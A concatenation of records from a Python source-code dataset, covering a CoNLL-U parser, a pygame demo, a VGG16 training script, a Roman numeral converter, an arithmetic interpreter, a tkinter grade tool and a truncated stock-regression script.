w['HEAD'] and h!= '0':\n graph.add_edge(h, w['ID'], key='ud', attr_dict={'REL':r, 'TYPE':'secondary'})\n if 'DEPENDENTS' not in graph.node[h]:\n graph.node[h]['DEPENDENTS'] = []\n graph.node[h]['DEPENDENTS'].append(w['ID'])\n self.logger.debug('edge2 ' + w['HEAD'] +' '+ w['ID'] +' '+ w['DEPREL'])\n \n # add ccg edges\n for w in words:\n if 'ARGS' in w:\n for idx, slot in w['ARGS']:\n graph.add_edge(w['ID'], idx, key='ccg', attr_dict={'ARG-NO':slot})\n self.logger.debug('edge ccg ' + w['ID'] +' '+ idx +' '+ slot)\n \n graph.graph['ROOT'] = root\n graph.graph['ROOTS'] = root_candidates\n self._graph = graph\n \n self.logger.debug('GRAPH:' + str(graph.graph))\n self.logger.debug('NODES:' + str(graph.nodes()))\n self.logger.debug('EDGES:' + str(graph.edges()))\n\n\n def to_features(self):\n '''\n skip multiword tokens\n '''\n for w in self.nodes:\n if '-' in w:\n continue\n feats = {}\n # node dict\n d = self.graph.node[w]\n feats['idx'] = w\n feats['pos'] = d['UPOSTAG']\n feats['pos_x'] = d['XPOSTAG']\n # head dict, only consider the given head, not secondary edges\n h = d['HEAD']\n feats['head'] = h\n if h == '_':\n feats['head_pos'] = '_'\n feats['head_pos_x'] = '_'\n feats['head_position'] = None # False\n feats['head_rel'] = '_'\n elif h != '0':\n dh = self.graph.node[h]\n feats['head_pos'] = dh['UPOSTAG']\n feats['head_pos_x'] = dh['XPOSTAG']\n feats['head_position'] = '<' if dh['POSITION'] < d['POSITION'] else '>'\n feats['head_rel'] = self.graph.edge[h][w]['ud']['REL']\n else:\n feats['head_pos'] = 'ROOT'\n feats['head_pos_x'] = 'ROOT'\n feats['head_position'] = None # False\n feats['head_rel'] = 'ROOT'\n feats['dep_count'] = 0\n # dependents, optional, multiple\n if 'DEPENDENTS' in d:\n feats['dep_count'] = len(d['DEPENDENTS'])\n if feats['dep_count']>10:\n self.logger.debug('pruning dependents from ' + self.graph.graph['COMMENTS'] +' word_id = '+ w)\n self.logger.debug('used first 10 of ' + str(feats['dep_count']) + ' dependencies')\n for i,dep in enumerate(d['DEPENDENTS']):\n if i>9:\n break\n dd = self.graph.node[dep]\n feats['dep_'+str(i+1)] = dep\n feats['dep_'+str(i+1)+'_pos'] = dd['UPOSTAG']\n feats['dep_'+str(i+1)+'_pos_x'] = dd['XPOSTAG']\n feats['dep_'+str(i+1)+'_position'] = '<' if dd['POSITION'] < d['POSITION'] else '>'\n feats['dep_'+str(i+1)+'_rel'] = 
self.graph.edge[w][dep]['ud']['REL']\n \n self._features.append(feats)\n \n \n def print_feat_dict(self, d):\n print('word'.ljust(15) +'\\t'+ self.graph.node[d['idx']]['FORM'])\n keys = ['idx', 'pos', 'pos_x', 'head', 'head_pos', 'head_pos_x', 'head_position', 'head_rel', 'dep_count']\n for k in keys + sorted([k for k in d if k not in keys], key=lambda x: (int(x.split('_')[1]), x)):\n print(k.ljust(12) +'\\t'+ str(d[k]))\n \n def print_feats(self):\n for feat in self.features:\n print()\n self.print_feat_dict(feat)\n \n def to_supertags(self):\n '''\n skip multiword tokens\n '''\n for w in self.nodes:\n if '-' in w:\n continue\n self._supertags.append(self.graph.node[w].get('CAT', '_'))\n\n \n def update_supertags(self, pred):\n for i,w in enumerate(self.nodes):\n if self.graph.node[w]['MISC'] == '_':\n self.graph.node[w]['MISC'] = 'cat='+pred[i]\n else:\n self.graph.node[w]['MISC'] += '|cat='+pred[i]\n \n\n def __repr__(self):\n s = ''\n if self.graph.graph['COMMENTS']:\n s += self.graph.graph['COMMENTS'] + '\\n'\n for n in self.nodes:\n if 'MULTI-FORM' in self.graph.node[n]:\n m_start = self.graph.node[n]['MULTI-IDS'].split('-')[0]\n if m_start == n:\n s += self.graph.node[n]['MULTI-IDS'] +'\\t'+ self.graph.node[n]['MULTI-FORM'] + 8*'\\t_' + '\\n'\n self.logger.debug(n +' : '+ self.graph.node[n]['MULTI-IDS'] +' '+ self.graph.node[n]['MULTI-FORM'])\n s += '\\t'.join(self.graph.node[n][k] for k in self.keys) + '\\n'\n s += '\\n'\n return s\n \n \n def init_logging(self, log_level):\n '''\n logging config and init\n '''\n if not self.logger:\n formatter = logging.Formatter('%(asctime)s-|%(name)s:%(funcName)12s|-%(levelname)s-> %(message)s')\n self.handler = logging.StreamHandler()\n self.handler.setLevel(log_level)\n self.handler.setFormatter(formatter)\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.addHandler(self.handler)\n self.logger.setLevel(log_level)\n \n \n def __del__(self):\n # remove handler or else duplicate logs\n self.logger.removeHandler(self.handler)\n # ? 
\n del self.logger \n\n\nif __name__ == '__main__':\n \n with open('ud-treebanks-conll2017/UD_English/en-ud-train.conllu', 'r', encoding='utf-8') as sample:\n sents = sample.read().strip().split('\\n\\n')\n\n for sent in sents:\n #deps = CoNLL_UD(sent.strip().split('\\n'), log_level=logging.DEBUG)\n deps = CoNLL_UD(sent.strip().split('\\n'))\n print(deps)\n #deps.print_feats()\n print(deps.supertags)\n del deps\n #for i in ['3', '8', '9', '10']:\n # print(deps.graph.node[i])\n #print()\n #for f in deps.features:\n # print(f)\n\n #deps.print_feats()\n\n","sub_path":"SupertaggerUD/conllu.py","file_name":"conllu.py","file_ext":"py","file_size_in_byte":14186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"270848330","text":"import logging\r\nfrom common import config\r\n\r\n\r\ndef setup_logging(log, conf):\r\n log.setLevel(conf.log_level)\r\n fh = logging.FileHandler(conf.log_file, mode='w')\r\n fh.setLevel(conf.log_level)\r\n fh.setFormatter(logging.Formatter(conf.log_format))\r\n log.addHandler(fh)\r\n\r\n\r\nglobal LOG\r\nLOG = logging.getLogger('openstack-tool')\r\nsetup_logging(LOG, config.CONF.log)\r\n","sub_path":"common/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"85914650","text":"import pygame as p\r\n\r\np.init() #초기화\r\nsize = (400,400)\r\nb = (0,0,0) #(R,G,B)\r\nw = (255,255,255)\r\nsc = p.display.set_mode(size)\r\np.display.set_mode(size) #해상도설정0\r\np.display.set_caption('image') #창이름\r\nx= p.image.load('1.png')\r\ny= p.image.load('2.png')\r\nz= p.image.load('3.png')\r\np.mixer.music.load('1.mp3')\r\np.mixer.music.load('2.mp3')\r\np.mixer.music.play()\r\ndone = False\r\n\r\nwhile not done:\r\n print('반복중')\r\n for event in p.event.get(): #사용자가 뭘 눌렀는지 감지 \r\n if event.type == p.QUIT: # 게임창 x 버튼을 눌렀다면\r\n done = True #계속 반복을 종료\r\n p.mixer.music.stop\r\n print('반복 끝남')\r\n\r\n sc.fill(w) #배경화면 색깔 설정\r\n sc.blit(x,(200,100))\r\n sc.blit(y,(100,100))\r\n sc.blit(z,(0,100))\r\n p.display.flip()\r\n \r\n\r\n\r\n","sub_path":"20-05-13 이미지 삽입2.py","file_name":"20-05-13 이미지 삽입2.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"435864669","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 创建一个字典student,key是学号,value是姓名\n# 学生信息在student.csv文件里,从文件中读取并保存到字典\n# 打开student.csv文件\n\nfile = open(r'E:\\学习文件夹\\人工班名单csv.csv','r')\n\n\n# In[2]:\n\n\n# 读取文件内容\nlines = file.readlines()\n\n\n# In[3]:\n\n\n# 抽取每行的学号和姓名,保存到字典\nstudents = {}\nfor line in lines:\n tmp_list = line.split(',')\n xuehao = tmp_list[0]\n xingming = tmp_list[2]\n students[xuehao] = xingming\nprint(students)\n\n\n# In[4]:\n\n\n# 从学号中随机抽取N个学号\nimport random\nnum = int(input(\"请输入你要抽取的人数:\"))\n# 如何把字典中的key(学号)抽取成列表\nxuehao_list = random.sample(students.keys(),num)\nxuehao_list\n\n\n# In[5]:\n\n\n# 根据随机的学号,打印输出对应的姓名\nfor xuehao in xuehao_list:\n print(students[xuehao])\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"git代码库/随机点名.py","file_name":"随机点名.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"251922671","text":"import cv2 \nimport os \nimport numpy as np \nfrom random import shuffle \nfrom tqdm import tqdm \nimport tensorflow as tf\nfrom tensorflow.keras import layers,Sequential,optimizers,applications, Model, applications \nfrom 
tensorflow.keras.preprocessing import image\n\nnum_classes=12\nbatch_size = 8 #more means better faster convergence but takes more resources\ntrain_data_num = 14000 #change it accordingly\n\n\ndata= np.load('augmented_data_mini_letter.npy', allow_pickle=True)\n\nprint(np.shape(data))\n'''Running the training and the testing in the dataset for our model'''\n\nimg_data = np.array([i[0] for i in data]).reshape(-1,224,224,3)\nlbl_data = np.array([i[1] for i in data]).reshape(-1,num_classes)\n\ntr_img_data = img_data[:train_data_num,:,:,:]\ntr_lbl_data = lbl_data[:train_data_num,:]\n\ntst_img_data = img_data[train_data_num:,:,:,:]\ntst_lbl_data = lbl_data[train_data_num:,:]\n\n\n#Code taken from: https://github.com/keras-team/keras/issues/9214\nbase_model = applications.VGG16(weights='imagenet', include_top=False)\nx = base_model.output\nx = layers.GlobalMaxPooling2D()(x)\nx = layers.Dense(512, activation='relu')(x)\npredictions = layers.Dense(num_classes, activation='softmax')(x)\nmodel = Model(inputs=base_model.input, outputs=predictions)\n#model.summary()\n \n\n \nx_train = applications.vgg16.preprocess_input(tr_img_data)\ny_train = tr_lbl_data\n\n\n\n \n#unfreezing all layers and retraining with low learning rate\nfor layer in model.layers:\n layer.trainable = True\n\n\n\noptimizer=optimizers.Adam(lr=5e-5)\nmodel.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(x_train, y_train, epochs=5 , batch_size=batch_size, shuffle=False, \n validation_split=0.1) #will try with 5 epochs later\n\n \n\nprint('Testing on unseen data:')\nx_test = applications.vgg16.preprocess_input(tst_img_data)\ny_test = tst_lbl_data\ntest_loss, test_acc = model.evaluate(x_test, y_test, verbose=1)\n#model.summary()\n\n\nmodel.save('vgg16_model_letter.h5')\n\nprint(\"Saved model to disk\")\n","sub_path":"Approach 2 - Letter 11 classes and Quality 4 classes/vgg16-train-letter.py","file_name":"vgg16-train-letter.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"338441663","text":"# Calculates value of roman numerals and throws errors if invalid\n\nvalue = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n}\n\ndef isSubtractive(c):\n return c == 'C' or c == 'X' or c == 'I'\n\ndef romanToNum(roman):\n prevVal = 1234567890\n total = 0\n i = 0\n valid = True\n while i < len(roman):\n if roman[i] not in value.keys():\n print(\"Bad1 \" + roman)\n valid = False\n break\n # Check if this could be a compound term\n if isSubtractive(roman[i]) and i+1 < len(roman):\n # Could be compound\n if roman[i+1] not in value.keys():\n print(\"Bad1 \" + roman)\n valid = False\n break\n if value[roman[i+1]] > value[roman[i]]:\n # Yes, this is a compound term\n if i+2 < len(roman):\n # Check that the next is valid\n if roman[i+2] not in value.keys():\n print(\"Bad1 \" + roman)\n valid = False\n break\n if value[roman[i+2]] >= value[roman[i]]:\n print(\"Bad3 \" + roman)\n valid = False\n break\n # Haven't broken, so we can go ahead\n val = value[roman[i+1]] - value[roman[i]]\n if val > prevVal:\n print(\"Bad2 \" + roman)\n valid = False\n break\n else:\n total += val\n prevVal = val\n i += 2\n continue\n # Everything that gets here is not a compound\n if i+1 < len(roman):\n if roman[i+1] not in value.keys():\n print(\"Bad1 \" + roman)\n valid = False\n break\n if value[roman[i+1]] > value[roman[i]]:\n # Not a compound term but the next value is larger\n print(\"Bad2 \" + 
roman)\n valid = False\n break\n val = value[roman[i]]\n if val > prevVal:\n print(\"Bad2 \" + roman)\n valid = False\n break\n else:\n total += val\n prevVal = val\n i += 1\n continue\n\n if valid:\n print(str(total) + \" \" + roman)\n\n# Read input here\nwith open(\"romannum.in\") as f:\n n = f.readline()\n romanNums = f.readlines()\n\nfor roman in romanNums:\n roman = roman.strip()\n if len(roman) < 1:\n print(\"Bad1\")\n else:\n romanToNum(roman)\n","sub_path":"ProgComp/romannum.py","file_name":"romannum.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"64490786","text":"import csv\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\n\nfile_name = 'c:/Users/Val/Desktop/Py/Project_2/16Loading data/CSV_file/sitka_weather_2018_simple.csv'\nwith open(file_name) as f:\n\treader = csv.reader(f) #csv.reader() метод принимет объект файла в аргументе, чтобы создать объект чтения данных для этого файла\n\theader_row = next(reader)\n\n\tfor index, column_header in enumerate(header_row): #enumerate() возвращает индекс каждого элемента и его значение при переборе списка\n\t\tprint(index, column_header)\n\t\n\t#Чтение дат и максимальных и минимальных температур из файла\n\tdates, highs, lows = [], [], []\n\t\n\tfor row in reader:\n\t\tcurrent_date = datetime.strptime(row[2], \"%Y-%m-%d\")\n\t\thigh = int(row[5])\n\t\tlow = int(row[6])\n\t\tdates.append(current_date)\n\t\thighs.append(high)\n\t\tlows.append(low)\n\n\t#Нанесение данных на диаграмму\n\tplt.style.use('seaborn')\n\tfig, ax = plt.subplots()\n\tax.plot(dates, highs, c='red', alpha=0.5)\n\tax.plot(dates, lows, c='blue', alpha=0.5)\n\tplt.fill_between(dates, highs, lows, facecolor = 'orange', alpha=0.5)\n\n\t#форматирование диаграммы\n\tplt.title(\"Daily high and low temperatures - 2018\", fontsize = 24)\n\tplt.xlabel('', fontsize = 16)\n\tfig.autofmt_xdate()\n\tplt.ylabel(\"Temperature (F)\", fontsize = 16)\n\tplt.tick_params(axis = 'both', which = 'major', labelsize = 16)\n\n\tplt.show()\n","sub_path":"Loading data/CSV_file/sitka_highs_lows.py","file_name":"sitka_highs_lows.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"636228375","text":"\"\"\"\n获取内容,分词,语法分析,生成部件,组合\n\n独立出一个移动指针向前的方法\n过滤空格的方法\n\n先分析语义,通过这一步去生成token\n然后在主要控制流,看token是否可以进行操作\n最后得到一个不可分解的因子就行了\n\n利用term这个方法加了一层,原本expr的作用就是去处理当前与下一个的关系,现在加了\n一层term,就类似递归,term也会去处理下一个与再下一个的关系,也通过while的条件\n约束来实现了类似优先级的效果\n\n这里解耦解得非常漂亮\n\nLexer --(Token)--> Parser --(AST)--> Interpreter\n通过Lexer生成token,然后通过parser将token作为一个个结点,构成树,最后解析器通过\n遍历树来得到结果\n\n\"\"\"\nINTEGER, EOF = 'integer', 'eof'\nPLUS, SUB, MUL, DIV = 'plus', 'sub', 'mul', 'div'\nLPARENT, RPARENT = '(', ')'\n\n\nclass Token:\n def __init__(self, type_, value):\n self.type = type_\n self.value = value\n\n def __str__(self):\n return 'Token({}, {})'.format(self.type, self.value)\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Lexer:\n def __init__(self, text):\n self._text = text\n self._pos = 0\n self._current_char = self._text[self._pos]\n\n def error(self):\n raise Exception('Invalid Input')\n\n def advance(self):\n self._pos += 1\n if self._pos < len(self._text):\n self._current_char = self._text[self._pos]\n else:\n self._current_char = None\n\n def skip_whitespace(self):\n while self._current_char is not None and self._current_char.isspace():\n self.advance()\n\n def multi_number(self):\n _number = ''\n 
while self._current_char is not None and self._current_char.isdigit():\n _number += self._current_char\n self.advance()\n return int(_number)\n\n def get_next_token(self):\n while self._current_char is not None:\n self.skip_whitespace()\n\n if self._current_char.isdigit():\n return Token(INTEGER, self.multi_number())\n\n if self._current_char == '+':\n self.advance() # 注意这里是要移动指针的\n return Token(PLUS, '+')\n\n if self._current_char == '-':\n self.advance()\n return Token(SUB, '-')\n\n if self._current_char == '*':\n self.advance()\n return Token(MUL, '*')\n\n if self._current_char == '/':\n self.advance()\n return Token(DIV, '/')\n\n if self._current_char == '(':\n self.advance()\n return Token(LPARENT, '(')\n\n if self._current_char == ')':\n self.advance()\n return Token(RPARENT, ')')\n\n self.error()\n\n return Token(EOF, None)\n\n\nclass AST:\n pass\n\n\nclass UnaryOp(AST): # 一元操作符,作用是让数字为正或负\n def __init__(self, op, expr):\n self.token = self.op = op\n self.expr = expr\n\n\nclass BinOp(AST):\n def __init__(self, left, op, right):\n self.left = left\n self.token = self.op = op\n self.right = right\n\n\nclass Num(AST):\n def __init__(self, token):\n self.token = token\n self.value = token.value\n\n\nclass Parser:\n def __init__(self, lexer):\n self._lexer = lexer\n self._current_token = self._lexer.get_next_token()\n\n def error(self):\n raise Exception('interpreter error')\n\n def eat(self, token_type): # 处理完当前token,向下走\n if self._current_token.type == token_type:\n self._current_token = self._lexer.get_next_token()\n else:\n self.error()\n\n def factor(self):\n _token = self._current_token\n\n if _token.type == PLUS:\n self.eat(PLUS)\n _node = UnaryOp(_token, self.factor())\n return _node\n elif _token.type == SUB:\n self.eat(SUB)\n _node = UnaryOp(_token, self.factor())\n return _node\n\n if _token.type == INTEGER:\n self.eat(INTEGER)\n return Num(_token)\n elif _token.type == LPARENT:\n self.eat(LPARENT)\n _node = self.expr() # 递归调用\n self.eat(RPARENT)\n return _node\n\n @staticmethod\n def construct_node(left, op, right):\n return BinOp(left=left, op=op, right=right)\n\n def term(self):\n _node = self.factor()\n while self._current_token.type in (MUL, DIV):\n _op = self._current_token\n if _op.value == '*':\n self.eat(MUL)\n elif _op.value == '/':\n self.eat(DIV)\n\n _node = self.construct_node(left=_node, op=_op, right=self.factor()) # 主要是通过这步生成子树,然后递归结合起来生成语法树\n return _node\n\n def expr(self):\n _node = self.term()\n while self._current_token.type in (PLUS, SUB):\n _op = self._current_token\n if _op.value == '+':\n self.eat(PLUS)\n elif _op.value == '-':\n self.eat(SUB)\n\n _node = self.construct_node(left=_node, op=_op, right=self.term())\n return _node\n\n def parse(self):\n return self.expr()\n\n\nclass NodeVisitor:\n def generic_visit(self, node):\n raise Exception('No visit_{} method'.format(type(node).__name__))\n\n def visit(self, node): # 类似适配器,根据不同的method_name去选择不同的方法\n method_name = 'visit_' + type(node).__name__\n visitor = getattr(self, method_name, self.generic_visit)\n return visitor(node)\n\n\nclass Interpreter(NodeVisitor):\n def __init__(self, parser):\n self._parser = parser\n\n def visit_UnaryOp(self, node):\n op = node.op.type\n if op == PLUS:\n return +self.visit(node.expr)\n elif op == SUB:\n return -self.visit(node.expr) # 单纯地取相反数而已\n\n def visit_BinOp(self, node): # 定义了具体的操作方法\n if node.op.type == PLUS:\n return self.visit(node.left) + self.visit(node.right)\n elif node.op.type == SUB:\n return self.visit(node.left) - self.visit(node.right)\n elif 
node.op.type == MUL:\n return self.visit(node.left) * self.visit(node.right)\n elif node.op.type == DIV:\n return self.visit(node.left) / self.visit(node.right)\n\n def visit_Num(self, node):\n return node.value\n\n def interpret(self):\n tree = self._parser.parse() # 拿到的是树的根结点\n return self.visit(tree)\n\n\nclass RPNTranslator(NodeVisitor):\n def __init__(self, tree):\n self.tree = tree\n\n def visit_BinOp(self, node):\n left_val = self.visit(node.left)\n right_val = self.visit(node.right)\n return '{left} {right} {op}'.format(\n left=left_val, right=right_val, op=node.op.value\n )\n\n def visit_Num(self, node):\n return node.value\n\n def translate(self):\n return self.visit(self.tree)\n\n\nclass LISPTranslator(RPNTranslator):\n def visit_BinOp(self, node):\n left_val = self.visit(node.left)\n right_val = self.visit(node.right)\n return '{op} {left} {right}'.format(\n left=left_val, right=right_val, op=node.op.value\n )\n\n\ndef main():\n try:\n while True:\n try:\n text = input('spi> ')\n except EOFError:\n break\n if not text:\n continue\n lexer = Lexer(text)\n parser = Parser(lexer)\n interpreter = Interpreter(parser)\n result = interpreter.interpret()\n print(result)\n except KeyboardInterrupt:\n print('\\nbye~')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"about_pascal/ast2.py","file_name":"ast2.py","file_ext":"py","file_size_in_byte":7892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"446099227","text":"from tkinter import *\nfrom tkinter import messagebox, Tk\n\nname_list = []\ntest1_score_list = []\ntest2_score_list = []\ntest3_score_list = []\nstudent_average_score = []\nstudent_total_score = []\n\nif name_list is []:\n class_average = 0\nelse:\n class_average = int(sum(test1_score_list) + sum(test2_score_list) + sum(test3_score_list) / len(name_list))\n\nconverted_test_1_score = None\nconverted_test_2_score = None\nconverted_test_3_score = None\nstudent_name = None\n\nadd_student_window = Tk()\nadd_student_window.withdraw()\ndef add_student():\n add_student_window.deiconify()\n def forgetall():\n out_of_scale_error1.grid_forget()\n out_of_scale_error2.grid_forget()\n out_of_scale_error3.grid_forget()\n\n invalid_input_error1.grid_forget()\n invalid_input_error2.grid_forget()\n invalid_input_error3.grid_forget()\n invalid_input_error4.grid_forget()\n invalid_input_error5.grid_forget()\n\n def cancel():\n return\n\n def submit():\n\n student_first_name = student_first_name_temp.get()\n student_surname_name = student_surname_name_temp.get()\n test_1_score = test_1_score_temp.get()\n test_2_score = test_2_score_temp.get()\n test_3_score = test_3_score_temp.get()\n\n forgetall()\n\n student_first_name_validation = student_first_name.isalpha()\n student_surname_name_validation = student_surname_name.isalpha()\n\n if student_first_name_validation is False:\n invalid_input_error4.grid(row=0, column=4)\n error1 = True\n else:\n error1 = None\n\n if student_surname_name_validation is False:\n invalid_input_error5.grid(row=1, column=4)\n error5 = True\n else:\n error5 = None\n\n try:\n converted_test_1_score = int(test_1_score)\n except ValueError:\n invalid_input_error1.grid(row=2, column=4)\n error2 = True\n else:\n if converted_test_1_score > 20:\n out_of_scale_error1.grid(row=2, column=4)\n error2 = True\n elif converted_test_1_score <= 0:\n out_of_scale_error1.grid(row=2, column=4)\n error2 = True\n else:\n out_of_scale_error1.grid_forget()\n invalid_input_error1.grid_forget()\n error2 = None\n\n try:\n 
converted_test_2_score = int(test_2_score)\n except ValueError:\n invalid_input_error2.grid(row=3, column=4)\n error3 = True\n else:\n if converted_test_2_score > 25:\n out_of_scale_error2.grid(row=3, column=4)\n error3 = True\n elif converted_test_2_score < 0:\n out_of_scale_error2.grid(row=3, column=4)\n error3 = True\n else:\n out_of_scale_error2.grid_forget()\n invalid_input_error2.grid_forget()\n error3 = None\n\n try:\n converted_test_3_score = int(test_3_score)\n except ValueError:\n invalid_input_error3.grid(row=4, column=4)\n error4 = True\n else:\n if converted_test_3_score > 35:\n out_of_scale_error3.grid(row=4, column=4)\n error4 = True\n elif converted_test_3_score < 0:\n out_of_scale_error3.grid(row=4, column=4)\n error4 = True\n else:\n out_of_scale_error3.grid_forget()\n invalid_input_error3.grid_forget()\n error4 = None\n\n if error1 is None:\n if error2 is None:\n if error3 is None:\n if error4 is None:\n if error5 is None:\n send()\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n\n def send():\n submit_button_action = messagebox.askyesno(title='save', message='Are you happy with what you have entered?')\n if submit_button_action > 0:\n name_list.append(student_name)\n test1_score_list.append(converted_test_1_score)\n test2_score_list.append(converted_test_2_score)\n test3_score_list.append(converted_test_3_score)\n\n print('Saved')\n add_student_window.destroy()\n\n\n student_first_name_temp = StringVar()\n student_surname_name_temp = StringVar()\n test_1_score_temp = StringVar()\n test_2_score_temp = StringVar()\n test_3_score_temp = StringVar()\n\n out_of_scale_error1 = Label(add_student_window, text='Mark Invalid', fg='red')\n out_of_scale_error2 = Label(add_student_window, text='Mark Invalid', fg='red')\n out_of_scale_error3 = Label(add_student_window, text='Mark Invalid', fg='red')\n\n # error. 
invalid input\n\n invalid_input_error1 = Label(add_student_window, text='please enter a valid number', fg='red')\n invalid_input_error2 = Label(add_student_window, text='please enter a valid number', fg='red')\n invalid_input_error3 = Label(add_student_window, text='please enter a valid number', fg='red')\n invalid_input_error4 = Label(add_student_window, text='please enter a valid first name', fg='red')\n invalid_input_error5 = Label(add_student_window, text='please enter a valid surname', fg='red')\n\n enter_first_name_label = Label(add_student_window, text='First Name')\n enter_surname_name_label = Label(add_student_window, text='Surname Name')\n test_1_score_label = Label(add_student_window, text='Test 1 Score')\n test_2_score_label = Label(add_student_window, text='Test 2 Score')\n test_3_score_label = Label(add_student_window, text='Test 3 Score')\n\n out_of_20_marks_label = Label(add_student_window, text='/20 Marks')\n out_of_25_marks_label = Label(add_student_window, text='/25 Marks')\n out_of_35_marks_label = Label(add_student_window, text='/35 Marks')\n\n student_first_name_entry = Entry(add_student_window, textvariable=student_first_name_temp)\n student_surname_name_entry = Entry(add_student_window, textvariable=student_surname_name_temp)\n test_1_score_entry = Entry(add_student_window, textvariable=test_1_score_temp)\n test_2_score_entry = Entry(add_student_window, textvariable=test_2_score_temp)\n test_3_score_entry = Entry(add_student_window, textvariable=test_3_score_temp)\n\n submit_button = Button(add_student_window, text='Submit', command=submit)\n cancel_button = Button(add_student_window, text='Cancel', command=cancel)\n\n enter_first_name_label.grid(row=0, column=0)\n enter_surname_name_label.grid(row=1, column=0)\n test_1_score_label.grid(row=2, column=0)\n test_2_score_label.grid(row=3, column=0)\n test_3_score_label.grid(row=4, column=0)\n\n student_first_name_entry.grid(row=0, column=1)\n student_surname_name_entry.grid(row=1, column=1)\n test_1_score_entry.grid(row=2, column=1)\n test_2_score_entry.grid(row=3, column=1)\n test_3_score_entry.grid(row=4, column=1)\n\n out_of_20_marks_label.grid(row=2, column=2)\n out_of_25_marks_label.grid(row=3, column=2)\n out_of_35_marks_label.grid(row=4, column=2)\n\n submit_button.grid(row=5, column=0)\n cancel_button.grid(row=5, column=1)\n\n add_student_window.mainloop()\n\n\n\n\n\ndef fix_score():\n student_average_score = []\n student_total_score = []\n student_count = len(name_list)\n list_count_average = 0\n list_count_total = 0\n if name_list == []:\n pass\n else:\n while True:\n if list_count_total < student_count:\n test1 = int(test1_score_list[list_count_total])\n test2 = int(test2_score_list[list_count_total])\n test3 = int(test3_score_list[list_count_total])\n student_total = test1 + test2 + test3\n student_total_score.append(student_total)\n list_count_total = list_count_total + 1\n else:\n break\n\n while True:\n if list_count_average < student_count:\n test1 = int(test1_score_list[list_count_average])\n test2 = int(test2_score_list[list_count_average])\n test3 = int(test3_score_list[list_count_average])\n test_average_score = int(test1 + test2 + test3 / 3)\n student_average_score.append(test_average_score)\n list_count_average = list_count_average + 1\n else:\n break\n\n if name_list == []:\n pass\n else:\n max_total = max(student_total_score)\n max_total_possition = student_total_score.index(max_total)\n best_student.grid(row=3, column=0)\n\ndef refresh():\n total_student_label.forget()\n total_student_label\n 
average_class_mark_label.forget()\n average_class_mark_label\n best_student.forget()\n best_student\n\n\n\nmain = Tk()\ntotal_student_label = Label(main, text='Student count: %s' % (len(name_list)), fg='green')\naverage_class_mark_label = Label(main, text='Average class mark: %s' % class_average, fg='blue')\nbest_student = Label(main, text='%s currently has the highest score with %s marks' % (name_list[max_total_possition], student_total_score[max_total_possition]), fg='red')\n\ntotal_student_label.grid(row=0, column=0)\naverage_class_mark_label.grid(row=1, column=0)\nbutton = Button(main, text='button', command=refresh)\nbutton.grid(row=2, column=0)\n\nfix_score()\n\n\nadd_student()\n\n","sub_path":"Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"438479572","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import skew\r\nfrom sklearn.ensemble import AdaBoostRegressor\r\nfrom pyearth import Earth\r\nfrom sklearn.metrics import mean_squared_error, r2_score\r\nimport talib\r\n\r\ntrain = pd.read_csv('AAPL5_train.csv') # 5-minute Apple data\r\ntest = pd.read_csv('AAPL5_test.csv')\r\n\r\n# Preprocess: remove unnecessary columns\r\ncols = list(train)[4:9]\r\ntrain = train[cols].astype(str)\r\n\r\nfor i in cols:\r\n for j in range(0,len(train)):\r\n train[i][j] = train[i][j].replace(\",\",\"\")\r\n \r\ntrain = train.astype(float)\r\n\r\nHT = talib.HT_DCPERIOD(train[''])\r\nstd = talib.STDDEV(train[''], timeperiod=7, nbdev=1)\r\n\r\nHT = pd.DataFrame(data={'HT_DCPERIOD':HT})\r\nstd = pd.DataFrame(data={'STDDEV':std})\r\n\r\ntrain = train.join(HT)\r\ntrain = train.join(std)\r\n\r\navgHT1 = train['HT_DCPERIOD'].mean()\r\navgSTD = train[\"STDDEV\"].mean()\r\n\r\ntrain['HT_DCPERIOD'].fillna(avgHT1, inplace=True)\r\ntrain['STDDEV'].fillna(avgSTD, inplace=True)\r\n\r\n# transform data using log(1+x)\r\ntrain[''] = np.log1p(train['']) \r\ny = train['']\r\nx = train\r\ndel x['']\r\ndel x['']\r\ndel x['']\r\ndel x['']\r\n\r\nnumeric_feats = x.dtypes[x.dtypes != \"object\"].index\r\nskewed_feats = train[numeric_feats].apply(lambda g: skew(g.dropna())) \r\nskewed_feats = skewed_feats.index \r\n\r\nx[skewed_feats] = np.log1p(x[skewed_feats])\r\n\r\n# Fit MARS\r\nmars = Earth(allow_missing=True)\r\nmars.fit(x,y)\r\nprint(mars.trace())\r\nprint(mars.summary())\r\n\r\ndef inverse(x):\r\n x = np.exp(x) - 1\r\n return x\r\n\r\ndef graph(x, y, y2, a, b, Title):\r\n fig = plt.figure()\r\n plt.plot(x[a:b],y[a:b],'r', label='Actual')\r\n 